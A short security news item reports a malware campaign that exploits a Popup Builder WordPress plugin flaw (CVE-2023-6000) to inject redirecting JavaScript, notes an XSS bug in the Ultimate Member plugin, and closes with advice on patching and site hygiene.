A recent malware campaign has been identified, taking advantage of a critical security flaw in the Popup Builder plugin for WordPress. According to the report, this campaign has affected over 3,900 websites in the past three weeks. Security researcher noted that these attacks are linked to domains registered less than a month ago, with registrations dating back to February 12th, 2024.
The malware campaign targets a vulnerability known as CVE-2023-6000 in Popup Builder, which can be exploited to create unauthorized admin users and install malicious plugins. This vulnerability was also exploited in the past as part of the Balada Injector campaign, affecting over 7,000 sites.
The current attacks involve injecting malicious JavaScript code into websites, which redirects visitors to phishing and scam pages. To protect their sites, WordPress owners are advised to update their plugins regularly, scan for suspicious code or users, and perform necessary cleanups.
The researcher emphasized the importance of keeping website software patched and up-to-date, as this malware campaign highlights the risks of neglecting security updates.
In a related development, the researcher disclosed a high-severity bug in the Ultimate Member plugin for WordPress. This cross-site scripting (XSS) flaw, tracked as CVE-2024-2123, allows unauthenticated attackers to inject arbitrary web scripts into vulnerable pages. The vulnerability has been patched in version 2.8.4, released on March 6, 2024.
It is critical for WordPress site owners to remain vigilant against such vulnerabilities and promptly apply patches and updates to safeguard their websites.
To prevent malware attacks through WordPress plugins, regularly update all plugins and themes to the latest versions. Remove any unused plugins or themes to reduce the attack surface. Use reputable security plugins and monitor your site for suspicious activity. Backup your site regularly to mitigate the impact of a potential compromise.